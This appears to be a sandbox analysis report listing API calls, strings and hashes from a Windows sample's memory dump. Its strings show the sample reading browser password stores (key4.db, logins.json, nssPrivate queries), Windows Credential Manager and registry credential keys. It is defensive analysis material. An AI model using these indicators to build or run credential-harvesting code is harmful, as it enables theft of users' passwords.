                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                      Strings
                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                      • , xrefs: 00406834
                                                                                      • key4.db, xrefs: 00406756
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                      • API String ID: 3614188050-3983245814
                                                                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040A973
                                                                                      • memset.MSVCRT ref: 0040A996
                                                                                      • memset.MSVCRT ref: 0040A9AC
                                                                                      • memset.MSVCRT ref: 0040A9BC
                                                                                      • sprintf.MSVCRT ref: 0040A9F0
                                                                                      • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                      • sprintf.MSVCRT ref: 0040AABE
                                                                                      • _mbscat.MSVCRT ref: 0040AAED
                                                                                        • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                      • sprintf.MSVCRT ref: 0040AB21
                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                      • API String ID: 710961058-601624466
                                                                                      • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                      • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                      • API String ID: 3402215030-3842416460
                                                                                      • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                      • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                      APIs
                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                      • API String ID: 2003275452-3138536805
                                                                                      • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                      • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                      • API String ID: 1012775001-1343505058
                                                                                      • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                      • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00444612
                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                      • memset.MSVCRT ref: 00444668
                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                      • memset.MSVCRT ref: 00444690
                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                      • String ID: salu
                                                                                      • API String ID: 3691931180-4177317985
                                                                                      • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                      • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 2449869053-232097475
                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                      • API String ID: 551151806-1288872324
                                                                                      • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                      • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                      APIs
                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                      • API String ID: 3259144588-3822380221
                                                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                      APIs
                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                      • API String ID: 2449869053-4258758744
                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                      APIs
                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                      • API String ID: 3866421160-4070641962
                                                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                      APIs
                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                      • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                      • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                      • API String ID: 1035899707-3647959541
                                                                                      • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                      • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                      • API String ID: 2360744853-2229823034
                                                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                      APIs
                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                      • memset.MSVCRT ref: 00410129
                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                      • memset.MSVCRT ref: 00410171
                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                      • String ID: \systemroot
                                                                                      • API String ID: 912701516-1821301763
                                                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
